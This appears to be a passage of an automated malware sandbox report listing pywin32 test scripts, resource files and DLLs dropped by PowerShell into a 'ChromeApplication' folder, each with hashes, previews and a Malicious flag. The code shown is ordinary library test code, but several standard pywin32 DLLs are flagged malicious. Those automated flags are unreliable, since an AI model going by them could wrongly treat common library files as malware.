                                                                                                                                                                                                  Preview:import threading.import time.import unittest..import pywintypes.import win32con.import win32event.import win32file.import win32pipe.import winerror.from pywin32_testutil import str2bytes # py3k-friendly helper...class PipeTests(unittest.TestCase):. pipename = "\\\\.\\pipe\\python_test_pipe".. def _serverThread(self, pipe_handle, event, wait_time):. # just do one connection and terminate.. hr = win32pipe.ConnectNamedPipe(pipe_handle). self.assertTrue(. hr in (0, winerror.ERROR_PIPE_CONNECTED), "Got error code 0x%x" % (hr,). ). hr, got = win32file.ReadFile(pipe_handle, 100). self.assertEqual(got, str2bytes("foo\0bar")). time.sleep(wait_time). win32file.WriteFile(pipe_handle, str2bytes("bar\0foo")). pipe_handle.Close(). event.set().. def startPipeServer(self, event, wait_time=0):. openMode = win32pipe.PIPE_ACCESS_DUPLEX. pipeMode = win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32print.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):681
                                                                                                                                                                                                  Entropy (8bit):4.600120055398157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:Lq42LdWU6QPJv/MPoYiSIkYdVhQMeZewofMm5bVHYRF2pV7u:WWUC1iSIkYzhcZe9m0pVS
                                                                                                                                                                                                  MD5:CA7875992F54668EE4C26B3E048F45D2
                                                                                                                                                                                                  SHA1:55A9F5610A0DCE2B4A618E450B1ACC532E10AC11
                                                                                                                                                                                                  SHA-256:1B1D69A6E32BCA5FAC96182ACB8DFD35AE8F48B452F2DD61BE67414AB79A42C4
                                                                                                                                                                                                  SHA-512:CE6AC1C67301052E0104C574BC510A62A8A63DF982C387B78EB04BA35628E39FFF1DA630B6FE550FEF7F95DBF233914909FE83BA9C9C1C3B25A540708C986EE4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Tests (scarce) for win32print module..import unittest..import win32print as wprn...class Win32PrintTestCase(unittest.TestCase):. def setUp(self):. self.printer_idx = 0. self.printer_levels_all = list(range(1, 10)). self.local_printers = wprn.EnumPrinters(wprn.PRINTER_ENUM_LOCAL, None, 1).. def test_printer_levels_read_dummy(self):. if not self.local_printers:. print("Test didn't run (no local printers)!"). return. ph = wprn.OpenPrinter(self.local_printers[self.printer_idx][2]). for level in self.printer_levels_all:. wprn.GetPrinter(ph, level)...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32profile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):389
                                                                                                                                                                                                  Entropy (8bit):4.535765323916297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:NyRFLXvLSYpwtstqrzQpFVb2WkEYoKXFfMLkppb2rkUAjpAC7Mv:NKFLXvO4TbTYtXJba2pV7u
                                                                                                                                                                                                  MD5:F78744E1A96E4C1F0F8A9B06C76BBD5F
                                                                                                                                                                                                  SHA1:67A8E82CADDB11F2E0CF590BEEC3BE0CFA5A3575
                                                                                                                                                                                                  SHA-256:D67BBF211BAFC8305BFC7E223DC56A88464E1BE5B65DB427745BBF8BC181D241
                                                                                                                                                                                                  SHA-512:01BA7F2D063E1C7F7FA480969BF7B16F67A851C09310A75A69ED7D5FD2B740D3143D2B766023515FCECC40C8203DA3EA2022D91BCEC9957527A3AD09D1410EF2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Test win32profile""".import os.import unittest..import win32profile...class Tester(unittest.TestCase):. def test_environment(self):. os.environ["FOO"] = "bar=baz". env = win32profile.GetEnvironmentStrings(). assert "FOO" in env. assert env["FOO"] == "bar=baz". assert os.environ["FOO"] == "bar=baz"...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32rcparser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2462
                                                                                                                                                                                                  Entropy (8bit):4.693224762679464
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:VYqchbQKoP586t8qj4sYRqZrqvOlH7gfS:VYqchYzt8gAqsOlH7gq
                                                                                                                                                                                                  MD5:FE721D7BDD29E9998EEB3208CDB4A95D
                                                                                                                                                                                                  SHA1:8DF8FD70E75CE58F5BCD5F89967DEECE0D5A8C93
                                                                                                                                                                                                  SHA-256:F677D0C135FF762FE60F9C1C52332ED6C04A776CB20E5C3C4FF0B0F05523D008
                                                                                                                                                                                                  SHA-512:6C1E3395039EAF8F6F2F4A2663352EBB8CAC534F8495DAA9B11CA158F1F2F2E6316BBB8362D177E6387AE7A320C914F7F33A1A9DCFD6307C0C0FADE2C7E7B8AB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os.import tempfile.import unittest..import win32con.import win32rcparser...class TestParser(unittest.TestCase):. def setUp(self):. rc_file = os.path.join(os.path.dirname(__file__), "win32rcparser", "test.rc"). self.resources = win32rcparser.Parse(rc_file).. def testStrings(self):. for sid, expected in (. ("IDS_TEST_STRING4", "Test 'single quoted' string"),. ("IDS_TEST_STRING1", 'Test "quoted" string'),. ("IDS_TEST_STRING3", 'String with single " quote'),. ("IDS_TEST_STRING2", "Test string"),. ):. got = self.resources.stringTable[sid].value. self.assertEqual(got, expected).. def testStandardIds(self):. for idc in "IDOK IDCANCEL".split():. correct = getattr(win32con, idc). self.assertEqual(self.resources.names[correct], idc). self.assertEqual(self.resources.ids[idc], correct).. def testTabStop(self):. d = self.resources.dialogs["I

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32timezone.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):774
                                                                                                                                                                                                  Entropy (8bit):4.544684110688971
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:l8TebQz+CK8iFa3vNnYtRz+tjyHkTn5pVS:l8qbQz+C1iFa/Nnsz+tj3FfS
                                                                                                                                                                                                  MD5:EB93616B87101E3636F95B9C99B8DB33
                                                                                                                                                                                                  SHA1:E1D393944DFB58A518DA53BC3F379E4116A396C4
                                                                                                                                                                                                  SHA-256:2C13496CCD350A1A6059ED8BACE5D943DE9C70201D1257FEE0687BAFE524F9A7
                                                                                                                                                                                                  SHA-512:76ED693E65AAC9BC4F6AE27C476F31EAEF498A3EBEC9FB5DAF1CA41B770D95B3A15BD88438CF2DCB02680C271E26EF77A805787BEBBC77331D269ECFA31D4287
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test module for win32timezone..import doctest.import sys.import unittest..import win32timezone...class Win32TimeZoneTest(unittest.TestCase):. def testWin32TZ(self):. # On 3.7 and later, the repr() for datetime objects changed to use kwargs - eg,. # eg, `datetime.timedelta(0, 10800)` is now `datetime.timedelta(seconds=10800)`.. # So we just skip the tests on 3.5 and 3.6. if sys.version_info < (3, 7):. from pywin32_testutil import TestSkipped.. raise TestSkipped(. "The repr() for datetime objects makes this test fail in 3.5 and 3.6". ).. failed, total = doctest.testmod(win32timezone, verbose=False). self.assertFalse(failed)...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32trace.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11415
                                                                                                                                                                                                  Entropy (8bit):4.51306928669101
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ZZjEDkF9M6VZwHSvCUsXsEboxhWm7mUksYgms47sQ8C9ZRB3UZbU83ViNuDRJZBg:ZWASEQSc6xcm7mUkx3ZXWU8oCNcCs
                                                                                                                                                                                                  MD5:D31B968890F11B8E808CB0A707353CB2
                                                                                                                                                                                                  SHA1:1C77EFD68D15B9E0D5D3031FE9C2BAD4087EDFEE
                                                                                                                                                                                                  SHA-256:CDDD29A1351F771EB9048BC4CFEBE24D7DAFDF9B80BE451E8B5B39D5602ED835
                                                                                                                                                                                                  SHA-512:52E99B1AEA9BB427DA3D64DA50BCF6FADCCAE5A1735066A65E1BA750A369E52AEFCFB75108FE4936DB02762B8F6A2AB5850C8362317620FC3363E94E8B0BA7E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os.import sys.import threading.import time.import unittest..import win32trace.from pywin32_testutil import TestSkipped..if __name__ == "__main__":. this_file = sys.argv[0].else:. this_file = __file__...def SkipIfCI():. # This test often fails in CI, probably when it is being run multiple times. # (ie, for different Python versions). # Github actions always have a `CI` variable.. if "CI" in os.environ:. raise TestSkipped("We skip this test on CI")...def CheckNoOtherReaders():. win32trace.write("Hi"). time.sleep(0.05). if win32trace.read() != "Hi":. # Reset everything so following tests still fail with this error!. win32trace.TermRead(). win32trace.TermWrite(). raise RuntimeError(. "An existing win32trace reader appears to be ". "running - please stop this process and try again". )...class TestInitOps(unittest.TestCase):. def setUp(self):. SkipIfCI(). # clear old data.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\test_win32wnet.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5810
                                                                                                                                                                                                  Entropy (8bit):4.711734132606811
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:LCkYbvWtakMDqPaR7v/RqtdfllFpK6tVlHCXEZyqLQ4wmILiW6gG06MTKNOq:9akMDqP27xqtdv9AUZHLQ479DMTNq
                                                                                                                                                                                                  MD5:5EA7551E921DA9DDEF12BEE243E4494B
                                                                                                                                                                                                  SHA1:F63F0CB65B4F881EAFFBE06A4C396A395F21E433
                                                                                                                                                                                                  SHA-256:A5D600D8C295CC07823DB4FBB1AAA9ADACF7627F59EF71E1EE9285BAA9E76CFC
                                                                                                                                                                                                  SHA-512:72675633C3E2BA2E48886912CF5FE719040E2D5341F570DF627F503FD0CA9497D0C3B8DBCB842EB43242F97A41AB9EF46E527034917666AAB301CB4B0219CD9C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import netbios.import win32api.import win32wnet.from pywin32_testutil import str2bytes..RESOURCE_CONNECTED = 0x00000001.RESOURCE_GLOBALNET = 0x00000002.RESOURCE_REMEMBERED = 0x00000003.RESOURCE_RECENT = 0x00000004.RESOURCE_CONTEXT = 0x00000005.RESOURCETYPE_ANY = 0x00000000.RESOURCETYPE_DISK = 0x00000001.RESOURCETYPE_PRINT = 0x00000002.RESOURCETYPE_RESERVED = 0x00000008.RESOURCETYPE_UNKNOWN = 0xFFFFFFFF.RESOURCEUSAGE_CONNECTABLE = 0x00000001.RESOURCEUSAGE_CONTAINER = 0x00000002.RESOURCEDISPLAYTYPE_GENERIC = 0x00000000.RESOURCEDISPLAYTYPE_DOMAIN = 0x00000001.RESOURCEDISPLAYTYPE_SERVER = 0x00000002.RESOURCEDISPLAYTYPE_SHARE = 0x00000003...NETRESOURCE_attributes = [. ("dwScope", int),. ("dwType", int),. ("dwDisplayType", int),. ("dwUsage", int),. ("lpLocalName", str),. ("lpRemoteName", str),. ("lpComment", str),. ("lpProvider", str),.]..NCB_attributes = [. ("Command", int),. ("Retcode", int),. ("Lsn", int),. ("Num", int),. # ("Buff

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\testall.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7254
                                                                                                                                                                                                  Entropy (8bit):4.324657504637411
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dL2D8uzIaoa80XFiHTPusLCsRg9LOwS2wsff2yIdEJBwys3u7HQ9jUNw8kKzTxsz:dGIRBeeT2OuEgfiGRoFQ9sC6
                                                                                                                                                                                                  MD5:7F09D3E18F73FEBB6A4CC0EF60200C1D
                                                                                                                                                                                                  SHA1:89B5B096A4FA43486597D5221DEA90E4B4C5F519
                                                                                                                                                                                                  SHA-256:DDFACE034C91EF063814F00BE94B76B846E9977088B7DA7FB7EC62A2CBE1EA7C
                                                                                                                                                                                                  SHA-512:ECAF5E1BBB6A4D9785778F5CF31AE91DFA80FE937636F16889D1B8CC87BE82D8FE48868FE0E410B5B8CD35772BB6B9E1F66474A122FC302E562D4B09C9C45B18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os.import re.import sys.import traceback.import unittest..import pywin32_testutil..# A list of demos that depend on user-interface of *any* kind. Tests listed.# here are not suitable for unattended testing..ui_demos = """GetSaveFileName print_desktop win32cred_demo win32gui_demo. win32gui_dialog win32gui_menu win32gui_taskbar. win32rcparser_demo winprocess win32console_demo. win32clipboard_bitmapdemo. win32gui_devicenotify. NetValidatePasswordPolicy""".split().# Other demos known as 'bad' (or at least highly unlikely to work).# cerapi: no CE module is built (CE via pywin32 appears dead).# desktopmanager: hangs (well, hangs for 60secs or so...).# EvtSubscribe_*: must be run together:.# SystemParametersInfo: a couple of the params cause markh to hang, and there's.# no great reason to adjust (twice!) all those system settings!.bad_demos = """cerapi desktopmanager win32comport_demo. EvtSubscribe_pull Evt

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\win32rcparser\python.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 33 x 33 x 4, image size 660, cbSize 778, bits offset 118
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):778
                                                                                                                                                                                                  Entropy (8bit):3.1275984527229412
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:4giJF9YnuKLG1jRsOuhsuyR5ejFKzRvqasurl99OOyHrLn:4bK61VMxFalw
                                                                                                                                                                                                  MD5:527ACF2CA463153A889C0D30366EFAC1
                                                                                                                                                                                                  SHA1:9A2FF9C2B217CB1A8541B6B44AB92080E4EA0935
                                                                                                                                                                                                  SHA-256:19623132815DADA9EA5C7C4883227F768BC904D7C2C5CFCE4259D21B14DF1CB1
                                                                                                                                                                                                  SHA-512:FA6D0B602628F5752BF5A9B58E0BA234B904DC571970FB426EEBE40072B9581A5BCAC3878B50C5DDA171B7637F87429CD94A6F7209ECBE029426781D46E2458E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:BM........v...(...!...!.............................................................................................................................................................3...................33.333...........33333330..........3:3333333333........330333.3330.........333.30.30.0........3.330......0..........333................3.330................33.................:330............:.....33.............:...:33..............:..30............:.3.30..............:...30...............:.330.........333.....330..........033....33..........33333...33..........333333:.30...........33333030..............0.30..............................................................................................3.................030.................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\win32rcparser\python.ico

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):766
                                                                                                                                                                                                  Entropy (8bit):2.9744570511075614
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:IEipKm6kpU3/tRz//lFWIzldyMQSCrDs+/Co08daaeP:IEiQm6kkRDtFrdyMJCrDs+/CAIP
                                                                                                                                                                                                  MD5:FC2A98F8A8428A9A6D5579C79A94FBD8
                                                                                                                                                                                                  SHA1:5A43595D92FF2E5AB3EFA2DF1A0643A27C09CD1F
                                                                                                                                                                                                  SHA-256:2E7402ED1683A751BB5222A0379E5D8A50E3467E35C0D0D35B2A3CCA645372DC
                                                                                                                                                                                                  SHA-512:FE9ECD2B045670D16AB305E5F6EE943D99B4DA320BE5D23CF5BE9A0FD35ED17A58C7479B23D27FBFA64A8DDE3DF2911FD1738CE46C772E6F55D4072C8CFCCC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...... ..............(... ...@...................................................................................................................................3.................33.333.........33333330......3:3333333333......330333.3330.....333.30.30.0....3.330......0......333............3.330..............33.............:330........:.....33.........:...:33..........:....30..........:.3.30..........:...30...........:.330.....333.....330......033....33......33333...33......333333:.30.......33333030..........0.30..............................................................................3.............030........................................g........................_........0...........................................................................G..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\win32rcparser\test.h

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1169
                                                                                                                                                                                                  Entropy (8bit):5.066451700026354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:mfAR2Xzlz9lh8IkXz/f7Yg3Fl9Kynarx48pfLtcmc2IcfDcb/:4HdV8I6T3/0ynadZM/
                                                                                                                                                                                                  MD5:60B583798EAE6B6F72A6278FAFF13250
                                                                                                                                                                                                  SHA1:F08720EDD570520DBF88BD241182D59994314045
                                                                                                                                                                                                  SHA-256:CE7A510695120F2EBB6BBEAC0C7B8FD2E4C0258BF4F637E392BD5E85FFF08BC2
                                                                                                                                                                                                  SHA-512:30F982EF35CAED22DF7DE381D3FD7B6EE50F0144337EA9AE2572928155C6EC4B98A840D99C8653F1E8EFE60BE14645CA35B9E7FDFA9CBA044589117ACA70F3DA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview://{{NO_DEPENDENCIES}}.// Microsoft Developer Studio generated include file..// Used by test.rc.//.#define IDS_TEST_STRING1 51.#define IDS_TEST_STRING2 52.#define IDS_TEST_STRING3 53.#define IDS_TEST_STRING4 54.#define IDS_TEST_STRING5 55.#define IDS_TEST_STRING6 56.#define IDS_TEST_STRING7 57.#define IDD_TEST_DIALOG1 101.#define IDD_TEST_DIALOG2 102.#define IDB_PYTHON 103.#define IDI_PYTHON 105.#define IDD_TEST_DIALOG3 105.#define IDC_EDIT1 1000.#define IDC_CHECK1 1001.#define IDC_EDIT2 1001.#define IDC_COMBO1 1002.#define IDC_SPIN1 1003.#define IDC_PROGRESS1 1004.#define IDC_SLIDER1 1005.#define IDC_LIST1 1006.#define IDC_TREE1 1007.#define IDC_TAB1 1008.#define IDC_ANIMATE1 1009.#define IDC_RICHEDIT1 1010.#define IDC_DATETIMEPICKER1 1011.#define IDC_MONTHCALENDAR1 1012.#define IDC_SCROLLBAR1 1013.#define IDC_SCROLLBAR2 1014.#define IDC_LIST2 1015.#define IDC_HELLO 1016.#define IDC_HELLO2 1017..// Next default values for new objects.//.#ifdef APSTUDIO_INVOKED.#ifndef APSTUDIO_READONLY

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\win32rcparser\test.rc

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6273
                                                                                                                                                                                                  Entropy (8bit):4.814338859710688
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:9IvbeVpdPK9POPlrjywqjiHwy/JrjxIF0mqnWldrheQ9nn5e:MbeVpdi9mPlSwqaJrjxi0mqnWPhX5e
                                                                                                                                                                                                  MD5:2C3DD64292595BF0C580F3EA135EEC18
                                                                                                                                                                                                  SHA1:29526198EEA82C60D9C40D3CD389C2BBBEF16FA0
                                                                                                                                                                                                  SHA-256:8BA44D67D9F96EE91975990BAA518DB303E6EE90AFABBED6953F4B21268CE01B
                                                                                                                                                                                                  SHA-512:A952FFF91B2DFECAA51EAFC7D08F47404E0C80D5F12896644E1E83BCE0B84C02BD6A2BCBF3F83D3EBC413484BCF82A5CADEFA90AAD938421CA85CBA9ED356BBE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview://Microsoft Developer Studio generated resource script..//.#include "test.h"..#define APSTUDIO_READONLY_SYMBOLS./////////////////////////////////////////////////////////////////////////////.//.// Generated from the TEXTINCLUDE 2 resource..//.#include "afxres.h"../////////////////////////////////////////////////////////////////////////////.#undef APSTUDIO_READONLY_SYMBOLS../////////////////////////////////////////////////////////////////////////////.// English (Australia) resources..#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENA).#ifdef _WIN32.LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_AUS.#pragma code_page(1252).#endif //_WIN32..#ifdef APSTUDIO_INVOKED./////////////////////////////////////////////////////////////////////////////.//.// TEXTINCLUDE.//..1 TEXTINCLUDE DISCARDABLE .BEGIN. "test.h\0".END..2 TEXTINCLUDE DISCARDABLE .BEGIN. "#include ""afxres.h""\r\n". "\0".END..3 TEXTINCLUDE DISCARDABLE .BEGIN. "\r\n". "\0".END..#endif // APSTUDIO_INVOKED.../////////////

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\timer.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                  Entropy (8bit):5.716617252323436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JhsSwN9L2hrRBJSwrzQVkzwBal2kcDjbwJjOtiGDqtoimF/lJkdumITzaJvGlkwv:JB2pCakzRlB+jbYj6iGDq1mFIdnjOlk
                                                                                                                                                                                                  MD5:B5A90C757460AAF2280B9DB020274F15
                                                                                                                                                                                                  SHA1:35D6999E10C8EE6ECD88940AE39BD89C6FD3C97E
                                                                                                                                                                                                  SHA-256:070FEC28E4150AFFDF69CBC3042FDDDBCC79E95AF33D613DB0D6E4BF3DEBEC90
                                                                                                                                                                                                  SHA-512:DE4B16E440C10556BE4B3F696E81626E11B68374385B9E4CDDE4DE0CAE6F10F70D36585807CD1D7B862C3C6E1306B5DED40654879C1584E9430DBC057B26D5B8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............{...{...{......{...z...{...~...{.......{...x...{.,.z...{.J.z...{...z...{...z...{.,.r...{.,.{...{.,.y...{.Rich..{.........................PE..L......d...........!.........................0...............................p............@..........................7..L....7.......P..L....................`.......2..T............................3..@............0...............................text............................... ..`.rdata..~....0......................@..@.data........@.......,..............@....rsrc...L....P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32api.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103424
                                                                                                                                                                                                  Entropy (8bit):6.3909294717445375
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:xBzJ+cRa1YmNAC06yHiG0fVhVFhLqN6/2yymx+dCanfO8eFgqT2JE:xBzJ+cZYVhVl/2yAdCa2Lv2E
                                                                                                                                                                                                  MD5:EE407DCEA96D260B9DF5AED85408FE8D
                                                                                                                                                                                                  SHA1:600A8CCC28069ABF6920536EE9D2DBBAB449EF5B
                                                                                                                                                                                                  SHA-256:91FA48528506D909C2E40103813789738915FF1318EF20118DC19D17AD017955
                                                                                                                                                                                                  SHA-512:45EACC91681556AC0DB64B071B600AF84F9CFDB65771529601095B6C1B69EF4B06632298F4B464EA1DF5AFD1DAD91E94977C28C9A752283D6C9A1F224EB3B9E3
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................`.....................l.........................l......l....l....Rich...........................PE..L......d...........!......................................................................@..........................C......TD..........\........................ ...:..T...............................@...............p...\C..@....................text...{........................... ..`.rdata..`k.......l..................@..@.data........p.......\..............@....rsrc...\............n..............@..@.reloc... ......."...r..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32clipboard.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21504
                                                                                                                                                                                                  Entropy (8bit):6.058338660371219
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:V7rLbe3Gp2GoXgR551OVpHV4rjjiqURJ0nl5Bzp1dn/g+yE+vpLF7:Vfb3D751OVpHV4uRmR9/g+ytpLh
                                                                                                                                                                                                  MD5:026FD8B8A64FAEF005332FDB04768C75
                                                                                                                                                                                                  SHA1:EE484A9A76D5F9AF7F2C9D0E298C5AFA58FB1C0C
                                                                                                                                                                                                  SHA-256:1D62BF814660CD5E45C9E0A3FB87C99CABCA20BA75C36C4E8B5A8C65FDA4565E
                                                                                                                                                                                                  SHA-512:485B16D1BFB2B026BBBCE1EABA53EDD8EC4AC282E9E3A1B4AB13F1A2CBCF2CB2A342BCD7A300B9BF1414CFEBE22772CBA5BD676C7E82A3BFAA5EA6DDD1C16634
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............................................x.......................................Rich...................PE..L......d...........!.....(...(......R'.......@............................................@.........................0N..\....N.......p..t............................I..T...........................XI..@............@...............................text...3'.......(.................. ..`.rdata.......@.......,..............@..@.data........`.......H..............@....rsrc...t....p.......J..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32console.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48128
                                                                                                                                                                                                  Entropy (8bit):6.224682276228643
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:DaSJeGiTydNIBDnAy9tSm8zzlihbDu2k9G79nmVoUG1q0gN/Dsm:DaSouIDAy3+zlAwVoUG1q0gN/Dh
                                                                                                                                                                                                  MD5:96C2E89F35B72A39A7FF9EB1F12B0C28
                                                                                                                                                                                                  SHA1:8B325403956BFC0B06A17D805B86E3E6196D9276
                                                                                                                                                                                                  SHA-256:9667B61CFC8155843CE13B12BD308EB7D271F2840441EBB1712FC11A9C88005A
                                                                                                                                                                                                  SHA-512:E5A3644D2D1B65FE396D2EDA70CBE86539D5099EC1C708D5F293708236A66E939290D72C7C1AF5D152846D932FE5ABEE3D7F935B3D00F62A02F86EEB64EA0728
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(.P(.P(.P!.3P..Pz..Q*.Pz..Q8.Pz..Q".Pz..Q).P.Q*.P...Q*.P<..Q+.P(.P..P.Q).P.Q).P.Q).PRich(.P................PE..L......d...........!.....V...b.......Q.......p............................................@.........................`...X...............l...........................|...T..............................@............p..,............................text...qT.......V.................. ..`.rdata...B...p...D...Z..............@..@.data...............................@....rsrc...l...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32cred.pyd

                                                                                                                                                                                                  Download File
